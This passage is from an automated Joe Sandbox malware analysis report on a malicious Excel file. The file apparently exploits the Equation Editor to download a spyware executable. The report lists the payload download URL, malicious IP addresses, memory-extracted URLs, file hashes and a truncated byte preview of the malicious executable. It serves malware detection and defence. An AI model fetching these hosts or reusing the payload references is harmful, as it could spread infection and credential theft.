https://api.ip.sbP vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe unknown
https://www.google.com/favicon.ico tmp72BF.tmp.5.dr false high
https://ac.ecosia.org/autocomplete?q= vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr
false high
crl.pkioverheid.nl/DomOvLatestCRL.crl0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false URL Reputation: safe unknown
schemas.xmlsoap.org/ws/2004/08/addressing vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
tempuri.org/Endpoint/GetUpdatesResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
https://cdn.discordapp.com/attachments/926046144130351104/945362888414072923/httpsgithub.comrakam-io
vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.498497574.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
Name Source Malicious Antivirus Detection Reputation
Copyright Joe Security LLC 2022 Page 13 of 65
tempuri.org/Endpoint/EnvironmentSettingsResponsevbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
ns.adobe. vbc.exe, 00000005.00000002.547155081.0000000000797000.00000004.00000020.00020000.00000000.sdmp
false URL Reputation: safe unknown
https://api.ipify. vbc.exe true Avira URL Cloud: safe unknown
https://secure.comodo.com/CPS0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr
false high
olypath.comP vbc.exe, 00000004.00000002.498573662.0000000002350000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe unknown
tempuri.org/h vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp
true Avira URL Cloud: phishing unknown
crl.entrust.net/2048ca.crl0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false high
https://api.ipify.orgcoo vbc.exe true Avira URL Cloud: safe unknown
schemas.xmlsoap.org/soap/actor/next vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr
false high
Name Source Malicious Antivirus Detection Reputation
World Map of Contacted IPs
Copyright Joe Security LLC 2022 Page 14 of 65
No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs
IP Domain Country Flag ASN ASN Name Malicious
162.159.130.233 cdn.discordapp.com United States 13335 CLOUDFLARENETUS false
178.18.193.160 olypath.com Turkey 50941 VARGONENTR false
179.43.175.99 unknown Panama 51852 PLI-ASCH true
103.171.0.134 unknown unknown 7575 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 576509
Start date: 22.02.2022
Start time: 15:29:06
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 23s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: POAT2076452.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:
8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabledEGA enabledHDC enabledAMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Public IPs
General Information
Copyright Joe Security LLC 2022 Page 15 of 65
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLSX@6/46@4/4
EGA Information: Successful, ratio: 100%
HDC Information: Successful, ratio: 1.6% (good quality ratio 1.4%)Quality average: 61.5%Quality standard deviation: 25.1%
HCA Information: Successful, ratio: 98%Number of executed functions: 0Number of non-executed functions: 0
Cookbook Comments: Adjust boot timeEnable AMSIFound application associated with file extension: .xlsxFound Word or Excel or PowerPoint or XPS ViewerAttach to Office via COMScroll downClose Viewer
Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exeTCP Packets have been reduced to 100Excluded IPs from analysis (wh itelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.netNot all processes where analyzed, report is missing behavior informationReport size getting too big, t oo many NtOpenKeyEx calls found.Report size getting too big, t oo many NtQueryDirectoryFile calls found.Report size getting too big, t oo many NtQueryValueKey calls found.VT rate limit hit for: POAT2076452.xlsx
Time Type Description
15:29:48 API Interceptor 55x Sleep call for process: EQNEDT32.EXE modified
15:29:51 API Interceptor 273x Sleep call for process: vbc.exe modified
⊘ No context
⊘ No context
⊘ No context
⊘ No context
⊘ No context
Warnings
Simulations
Behavior and APIs
Joe Sandbox View / Context
IPs
Domains
ASNs
JA3 Fingerprints
Dropped Files
Created / dropped FilesCopyright Joe Security LLC 2022 Page 16 of 65
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 14336
Entropy (8bit): 5.171700803602097
Encrypted: false
SSDEEP: 192:uYzXW2Cwl0D1p62Ojdu8kYfDOJSxYINAJ5:uYbWkGXOjdu8k4DOY6TJ
MD5: 980EC4304344F277D722024ADE08CD01
SHA1: DBA030AEE01753EA3E5EF7C9E73725A306B6DBA5
SHA-256: 1BF69A60DFFFB6903E317E5D5DDC9DFCF24C250B6A2DEB9749785C509A986105
SHA-512: 222CAA856AB958EB7E0DF8AD41F0C9A5CE3EDD00FC10896058FB38A73A6CB897E3785862F0F1CD963D65CF5FE90E0E1A3A66E84F70C4BAF16762BC9192EEAD68
Malicious: true
Antivirus: Antivirus: Joe Sandbox ML, Detection: 100%Antivirus: ReversingLabs, Detection: 7%
Reputation: low
IE Cache URL: 103.171.0.134/_spaceX2__/.win32.exe
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.............................M... ...`....@.. ....................................@..................................M..S....`..............................PL............................................... ............... ..H............text....-... ...................... ..`.rsrc........`.......0..............@[email protected]..............@..B.................M......H........1..x.......9....................................................0..........(..........o...........s....(...+(...+.(.....8...........o....(...+....%..9......r...p([email protected](....-a..r...p(....-j..r#..p(....-s..r/..p(....:....8N......(.......2....i/...(.....8....r9..p(....8............(....(....8............(....(....8............(..........i0Ys........rU..po....&..rY..p.....(....(...+o....&..r_..po....&..o..........o....(....8....rc..p(....+v........(..........i0Vs
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 10202
Entropy (8bit): 7.870143202588524
Encrypted: false
SSDEEP: 192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5: 66EF10508ED9AE9871D59F267FBE15AA
SHA1: E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256: 461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512: 678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious: false
Reputation: high, very likely benign file
Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./[email protected][email protected]]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<[email protected]...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@[email protected]/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*[email protected] :.+H...Rh..
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 10202
Entropy (8bit): 7.870143202588524
Encrypted: false
SSDEEP: 192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5: 66EF10508ED9AE9871D59F267FBE15AA
SHA1: E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256: 461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512: 678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious: false
Reputation: high, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34F90E45.png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FE9EF17.png
Copyright Joe Security LLC 2022 Page 17 of 65
Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./[email protected][email protected]]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<[email protected]...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@[email protected]/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*[email protected] :.+H...Rh..
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 3747
Entropy (8bit): 7.932023348968795
Encrypted: false
SSDEEP: 96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
MD5: 5EB99F38CB355D8DAD5E791E2A0C9922
SHA1: 83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
SHA-256: 5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
SHA-512: 80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
Malicious: false
Reputation: moderate, very likely benign file
Preview: .PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 11303
Entropy (8bit): 7.909402464702408
Encrypted: false
SSDEEP: 192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5: 9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1: E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256: 88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512: 81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious: false
Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,[email protected].:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`[email protected]../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 5396
Entropy (8bit): 7.915293088075047
Encrypted: false
SSDEEP: 96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
MD5: 590B1C3ECA38E4210C19A9BCBAF69F8D
SHA1: 556C229F539D60F1FF434103EC1695C7554EB720
SHA-256: E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
SHA-512: 481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
Malicious: false
Preview: .PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{[email protected].?~L2..Z...:....0p..x<[email protected]<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|[email protected].......&.J155u.s>[email protected].$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51123782.png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\540F5A54.png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\597D09DF.png
Copyright Joe Security LLC 2022 Page 18 of 65
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 3747
Entropy (8bit): 7.932023348968795
Encrypted: false
SSDEEP: 96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
MD5: 5EB99F38CB355D8DAD5E791E2A0C9922
SHA1: 83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
SHA-256: 5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
SHA-512: 80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
Malicious: false
Preview: .PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 1099960
Entropy (8bit): 2.0153141692634335
Encrypted: false
SSDEEP: 3072:nXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:tahIFdyiaT2qtXl
MD5: 8933AD2DEA3390B99DDB8AB58199F107
SHA1: 0B63D26D4874E10E225810BAD34C61E81F4295C0
SHA-256: 38209C7C7C296B024FB42ECAB403D1835E7F193F27D82D14EA38FE94505F0F76
SHA-512: 214434AB87550A250F1F3E201C07FC993D204DCDC88C6B4CAE5EFA495541FC5CA999F0ED835E79E3965AB5DCB166D3B6065F167658069F4B5E4F9F2F56FDB7A7
Malicious: false
Preview: ....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... [email protected]...\...P...EMF+"@...........@[email protected]@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$.......f.x.@N.%......0............RQUQ.............x..$QUQ...... ...Id.x...... ............d.x........................................%...X...%...7...................{$..................C.a.l.i.b.r.i........... ..X..........8.x........dv......%...........%...........%...........!..............................."...........%...........%...........%[email protected][email protected]... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 5396
Entropy (8bit): 7.915293088075047
Encrypted: false
SSDEEP: 96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
MD5: 590B1C3ECA38E4210C19A9BCBAF69F8D
SHA1: 556C229F539D60F1FF434103EC1695C7554EB720
SHA-256: E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
SHA-512: 481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
Malicious: false
Preview: .PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{[email protected].?~L2..Z...:....0p..x<[email protected]<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|[email protected].......&.J155u.s>[email protected].$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D634E2C.png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5A50888.emf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF292561.png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEDCE7D6.jpeg
Copyright Joe Security LLC 2022 Page 19 of 65
Category: dropped
Size (bytes): 4396
Entropy (8bit): 7.884233298494423
Encrypted: false
SSDEEP: 96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
MD5: 22FEC44258BA0E3A910FC2A009CEE2AB
SHA1: BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
SHA-256: 5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
SHA-512: 8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
Malicious: false
Preview: ......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&[email protected].*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 2647
Entropy (8bit): 7.8900124483490135
Encrypted: false
SSDEEP: 48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
MD5: E46357D82EBC866EEBDA98FA8F94B385
SHA1: 76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
SHA-256: B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
SHA-512: 8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
Malicious: false
